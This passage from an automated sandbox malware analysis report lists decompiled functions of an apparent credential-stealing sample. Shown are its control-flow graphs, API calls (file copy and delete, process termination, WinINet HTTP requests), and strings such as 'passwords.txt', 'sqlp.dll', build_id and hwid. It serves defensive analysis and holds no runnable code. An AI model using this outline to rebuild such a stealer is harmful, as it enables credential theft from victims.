                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1437 9369f8-936a91 call 93051e * 3 call 9304bc * 6 1455 936a96-936aea call 9229f8 call 922a09 call 921cfd call 936908 call 930562 call 922920 StrCmpCA 1437->1455 1468 936b33-936b43 StrCmpCA 1455->1468 1469 936aec-936b2e call 922a1a call 9304ee call 921cfd call 936880 call 930562 call 922920 1455->1469 1470 936e60-936e8a call 930562 call 9304bc call 930562 call 922920 1468->1470 1471 936b49-936ba3 call 922a2b call 922a3c call 921cfd call 936908 call 930562 call 922920 StrCmpCA 1468->1471 1469->1468 1498 936e8f-936ef9 call 9304bc call 930562 call 922920 call 936f2e call 922920 * 6 call 936f17 call 921cde 1470->1498 1508 936ba5-936bce call 922a4d call 9304ee call 921cfd call 936880 1471->1508 1509 936bec-936bfc StrCmpCA 1471->1509 1540 936bd3-936be7 call 930562 call 922920 1508->1540 1511 936c02-936c5c call 922a5e call 922a6f call 921cfd call 936908 call 930562 call 922920 StrCmpCA 1509->1511 1512 936e2f-936e5e call 930562 call 9304bc call 930562 call 922920 1509->1512 1557 936ca5-936cb5 StrCmpCA 1511->1557 1558 936c5e-936ca0 call 922a80 call 9304ee call 921cfd call 936880 call 930562 call 922920 1511->1558 1512->1498 1540->1509 1560 936cbb-936ccb StrCmpCA 1557->1560 1561 936dfe-936e2d call 930562 call 9304bc call 930562 call 922920 1557->1561 1558->1557 1565 936cd1-936d2b call 922ac4 call 922ad5 call 921cfd call 936908 call 930562 call 922920 StrCmpCA 1560->1565 1566 936dca-936df9 call 930562 call 9304bc call 930562 call 922920 1560->1566 1561->1498 1608 936d74-936d84 StrCmpCA 1565->1608 1609 936d2d-936d6f call 922ae6 call 9304ee call 921cfd call 936880 call 930562 call 922920 1565->1609 1566->1498 1610 936d96-936dc5 call 930562 call 9304bc call 930562 call 922920 1608->1610 1611 936d86-936d91 Sleep 1608->1611 1609->1608 1610->1498 1611->1455
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrlenA.KERNEL32(?,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930524
                                                                                                                                                                                                                • Part of subcall function 0093051E: lstrcpyA.KERNEL32(00000000,00000000,?,00937300,009566BE,009566BB,?,?,?,?,0093871B), ref: 00930556
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00936908: StrCmpCA.SHLWAPI(?,ERROR), ref: 0093695C
                                                                                                                                                                                                                • Part of subcall function 00936908: lstrlenA.KERNEL32(?), ref: 00936967
                                                                                                                                                                                                                • Part of subcall function 00936908: StrStrA.SHLWAPI(00000000,?), ref: 0093697C
                                                                                                                                                                                                                • Part of subcall function 00936908: lstrlenA.KERNEL32(?), ref: 0093698B
                                                                                                                                                                                                                • Part of subcall function 00936908: lstrlenA.KERNEL32(00000000), ref: 009369A4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936AE2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936B3B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936B9B
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936BF4
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936C54
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936CAD
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936CC3
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00936880: StrCmpCA.SHLWAPI(?,ERROR), ref: 009368B5
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936D23
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 00936D7C
                                                                                                                                                                                                              • Sleep.KERNEL32(0000EA60), ref: 00936D8B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpylstrlen$Sleep
                                                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sql.dll$sqlp.dll$sqlp.dll$sqlp.dll
                                                                                                                                                                                                              • API String ID: 507064821-4224206380
                                                                                                                                                                                                              • Opcode ID: f5d27164d039ceacf22d0b02345f2a6d1be29be3134e4e8ab593b7712618efa2
                                                                                                                                                                                                              • Instruction ID: d2235f3825f24b1e50adf40849bfe0e771b8da81c615df2e499afeaa79df78ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f5d27164d039ceacf22d0b02345f2a6d1be29be3134e4e8ab593b7712618efa2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1C1E635E40228ABCB10FB65ED47B8C7770AFC4704F918160F959B716AEB34AE598F81
                                                                                                                                                                                                              Function 00928853 Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 389memoryfilestringCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 1968 928853-928870 call 93076a 1971 928872-928877 1968->1971 1972 928879-928889 call 93076a 1968->1972 1973 928890-928898 call 93051e 1971->1973 1977 92889a-9288aa call 93076a 1972->1977 1978 92888b 1972->1978 1980 9288b0-92892d call 9304bc call 931c1f call 9305de call 93059c call 9305de call 93059c call 930562 call 922920 * 5 1973->1980 1977->1980 1984 928d85-928da9 call 922920 * 3 call 921cde 1977->1984 1978->1973 2016 928944-928954 CopyFileA 1980->2016 2017 928956-92898f call 9304bc call 9305de call 930562 call 922920 2016->2017 2018 92892f-928941 call 9304ee call 932285 2016->2018 2031 928991-9289e2 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 2017->2031 2032 9289e7-928a66 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 9305de call 930562 call 922920 2017->2032 2018->2016 2065 928a6b-928a84 call 922920 2031->2065 2032->2065 2074 928a8a-928aa5 2065->2074 2075 928d5e-928d6a DeleteFileA call 922920 2065->2075 2082 928d4a-928d5d 2074->2082 2083 928aab-928ac1 GetProcessHeap RtlAllocateHeap 2074->2083 2080 928d6f-928d80 call 922920 * 3 2075->2080 2080->1984 2082->2075 2086 928ced-928cfa 2083->2086 2093 928d00-928d0c lstrlenA 2086->2093 2094 928ac6-928baa call 9304bc * 6 call 921cfd call 9304ee call 92826d StrCmpCA 2086->2094 2093->2082 2096 928d0e-928d3a call 921cfd lstrlenA call 9304ee call 937023 2093->2096 2130 928bb3-928bc6 StrCmpCA 2094->2130 2131 928bac 2094->2131 2106 928d3f-928d45 call 922920 2096->2106 2106->2082 2132 928bd0 2130->2132 2133 928bc8-928bce 2130->2133 2131->2130 2134 928bd6-928bee call 93051e StrCmpCA 2132->2134 2133->2134 2137 928bf0-928bf6 2134->2137 2138 928bf8 2134->2138 2139 928bfe-928c09 call 93051e 2137->2139 2138->2139 2142 928c0b-928c13 call 93051e 2139->2142 2143 928c18-928ce8 lstrcatA * 14 call 922920 * 7 2139->2143 2142->2143 2143->2086
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0093076A: StrCmpCA.SHLWAPI(?,?,?,0092886E,?,?,?), ref: 00930773
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092894C
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00932285: _memset.LIBCMT ref: 009322AC
                                                                                                                                                                                                                • Part of subcall function 00932285: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00932352
                                                                                                                                                                                                                • Part of subcall function 00932285: TerminateProcess.KERNEL32(00000000,00000000), ref: 00932360
                                                                                                                                                                                                                • Part of subcall function 00932285: CloseHandle.KERNEL32(00000000), ref: 00932367
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00928AB1
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00928AB8
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR_V128), ref: 00928BA2
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009571E0), ref: 00928BBB
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009571E4), ref: 00928BE3
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00928D03
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 00928D1E
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00928D61
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
                                                                                                                                                                                                              • String ID: ERROR_V128
                                                                                                                                                                                                              • API String ID: 2819533921-2537946777
                                                                                                                                                                                                              • Opcode ID: d4c9785940a8bf2ac390d4ca8bb5d668e8d756ee45b6e0c0dfc88cb5dd4338cd
                                                                                                                                                                                                              • Instruction ID: a11f61ca3bd96c3a22986a343ce8be90fa535e8b8dd17ceb819c909aa81c4d28
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4c9785940a8bf2ac390d4ca8bb5d668e8d756ee45b6e0c0dfc88cb5dd4338cd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9CE12A32900219ABCF11FFA0ED46ADEBB75AF88305F514025F915B7066DF35AE868F50
                                                                                                                                                                                                              Function 00928533 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 231stringmemoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 009285D8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0092862D
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00928634
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 009286D2
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 009286EB
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 009286F5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0095719C), ref: 00928701
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 0092870B
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571A0), ref: 00928717
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00928724
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 0092872E
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571A4), ref: 0092873A
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 00928747
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00928751
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571A8), ref: 0092875D
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?), ref: 0092876A
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 00928774
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571AC), ref: 00928780
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,009571B0), ref: 0092878C
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 009287C5
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 00928812
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                              • String ID: passwords.txt
                                                                                                                                                                                                              • API String ID: 1956182324-347816968
                                                                                                                                                                                                              • Opcode ID: 9f56d350d0325ec6f31a3aecbf899052f9ab828ea27e3618222ef99620327862
                                                                                                                                                                                                              • Instruction ID: 4bbc43a2738c755d9f42fe239aa282b4a0ae8035d052181c2d8c23c9f0963871
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f56d350d0325ec6f31a3aecbf899052f9ab828ea27e3618222ef99620327862
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7812836900218BBCF02BBA0FD4AADE7BB5AF88301F514050FA19B3165DF359E958B95
                                                                                                                                                                                                              Function 00921666 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 129memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 2310 921666-92169e GetTempPathW 2311 9216a4-9216cb wsprintfW 2310->2311 2312 921809-92180b 2310->2312 2314 9216d0-9216f5 CreateFileW 2311->2314 2313 9217fa-921808 call 93d1a8 2312->2313 2314->2312 2316 9216fb-92174e GetProcessHeap RtlAllocateHeap _time64 srand rand call 943da0 WriteFile 2314->2316 2316->2312 2320 921754-92175a 2316->2320 2320->2312 2321 921760-92179c call 943da0 CloseHandle CreateFileW 2320->2321 2321->2312 2324 92179e-9217b1 ReadFile 2321->2324 2324->2312 2325 9217b3-9217b9 2324->2325 2325->2312 2326 9217bb-9217f1 call 943da0 GetProcessHeap RtlFreeHeap CloseHandle 2325->2326 2326->2314 2329 9217f7-9217f9 2326->2329 2329->2313
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00921696
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 009216BC
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000100,00000000), ref: 009216E6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,000FFFFF), ref: 009216FE
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 00921705
                                                                                                                                                                                                              • _time64.MSVCRT ref: 0092170E
                                                                                                                                                                                                              • srand.MSVCRT ref: 00921715
                                                                                                                                                                                                              • rand.MSVCRT ref: 0092171E
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092172E
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,000FFFFF,?,00000000), ref: 00921746
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00921763
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00921771
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,04000100,00000000), ref: 0092178D
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,000FFFFF,?,00000000), ref: 009217A9
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009217BE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 009217C8
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 009217CF
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 009217DB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$_memset$CloseCreateHandleProcess$AllocateFreePathReadTempWrite_time64randsrandwsprintf
                                                                                                                                                                                                              • String ID: %s%s$delays.tmp
                                                                                                                                                                                                              • API String ID: 1620473967-1413376734
                                                                                                                                                                                                              • Opcode ID: 8002fbb36e137a5b8745a520db8c02df336cce6a328b37cca09c9d521b36a37f
                                                                                                                                                                                                              • Instruction ID: ef484df94de598fd6cf76ef7efdf5575b8fbe90f054755f62d377a65ae620498
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8002fbb36e137a5b8745a520db8c02df336cce6a328b37cca09c9d521b36a37f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2741A3B1D11318ABDB209F72AC4DFAF7B7DEBD5722F0005A9B00AD10A1DA314964DF60
                                                                                                                                                                                                              Function 00924B2E Relevance: 33.6, APIs: 12, Strings: 7, Instructions: 378networkstringfileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 2330 924b2e-924bf3 call 9304ee call 924ab6 call 9304bc * 5 InternetOpenA StrCmpCA 2345 924bf5 2330->2345 2346 924bfb-924c01 2330->2346 2345->2346 2347 924c07-924d91 call 931c1f call 93059c call 930562 call 922920 * 2 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 93059c call 930562 call 922920 * 2 InternetConnectA 2346->2347 2348 925194-925236 InternetCloseHandle call 922920 * 8 call 93d1a8 2346->2348 2347->2348 2417 924d97-924dd1 HttpOpenRequestA 2347->2417 2418 924dd7-924ddd 2417->2418 2419 925188-92518e InternetCloseHandle 2417->2419 2420 924dfb-92511a call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 9305de call 930562 call 922920 call 93059c call 930562 call 922920 call 9304bc call 93059c * 2 call 930562 call 922920 * 2 lstrlenA * 2 HttpSendRequestA 2418->2420 2421 924ddf-924df5 InternetSetOptionA 2418->2421 2419->2348 2524 92515c-925174 InternetReadFile 2420->2524 2421->2420 2525 925176-925183 InternetCloseHandle call 922920 2524->2525 2526 92511c-925124 2524->2526 2525->2419 2526->2525 2528 925126-925157 call 9305de call 930562 call 922920 2526->2528 2528->2524
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AE8
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AEE
                                                                                                                                                                                                                • Part of subcall function 00924AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00924AF4
                                                                                                                                                                                                                • Part of subcall function 00924AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00924B06
                                                                                                                                                                                                                • Part of subcall function 00924AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00924B0E
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00924BCD
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 00924BEB
                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00924D83
                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00924DC7
                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00924DF5
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00956947,",build_id,009577BC,------,009577B0,",hwid,0095779C,------), ref: 009250EE
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,00000000), ref: 00925101
